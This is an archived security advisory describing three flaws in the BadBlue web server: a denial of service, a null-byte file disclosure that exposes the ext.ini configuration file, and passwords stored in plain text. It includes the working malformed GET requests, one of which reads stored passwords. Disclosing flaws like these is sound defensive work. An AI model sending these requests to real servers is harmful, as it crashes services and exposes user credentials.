Mailing List Archive

Three BadBlue Vulnerabilities
Advisory: Working Resources BadBlue Multiple Vulnerabilities

Issue: Three vulnerabilities; a denial of service, an insecurity in password
storage, and a file disclosure vulnerability that could allow viewing of the
password file.

Risk: Critical

SecurityFocus: "Working Resources BadBlue Invalid Get Request Denial of
Service Vulnerability" describes one of these issues.

Invalid GET Request Vulnerability
----------------------------------

By sending a specially crafted GET request (specifically, one with no
filename component) it is possible to cause the server to stop handling
further requests. The administrator must fully exit and manually restart
the server to resume normal operation:

GET HTTP/1.0

Some servers withstood this, but balked at a similar request:

GET HTTP/1.0

The only difference here being two spaces instead of one.

Malformed Escaping Invalid Byte Vulnerability
-----------------------------------------------

By sending a malformed version of an HTTP-escaped NULL byte ("%00") BadBlue
can be forced to return the source code of the desired file (or the binary
content if the file is a binary). This vulnerability can be used to read
the contents of EXT.INI, which stores BadBlue's configuration data,
including any users or Access Control Lists (ACLs) on the server and the
passwords for any such data, as well. The attacker simply appends ".%
00.txt" to the filename. BadBlue appears to strip spaces after
HTTP-escaping, but does this after null-byte filtering has already been
applied, causing this specially designed request to bypass the filter:

GET /ext.ini.% 00.txt HTTP/1.0

Will reveal the contents of the BadBlue configuration file. If the server
is configured to allow uploads, but not to allow read/execute access without
a password, this can be used to break the password protection.

Un-encrypted Password Vulnerability
--------------------------------------

This vulnerability involves the password storage in the aforementioned
ext.ini file. The vulnerability allows a local user with read access to the
configuration file to see any passwords for secured resources or user
accounts. BadBlue stores the passwords with no encryption at all, meaning
that simply opening the file is sufficient for password theft. Combined
with the above vulnerability, this enables a remote user to read the
passwords of any BadBlue server.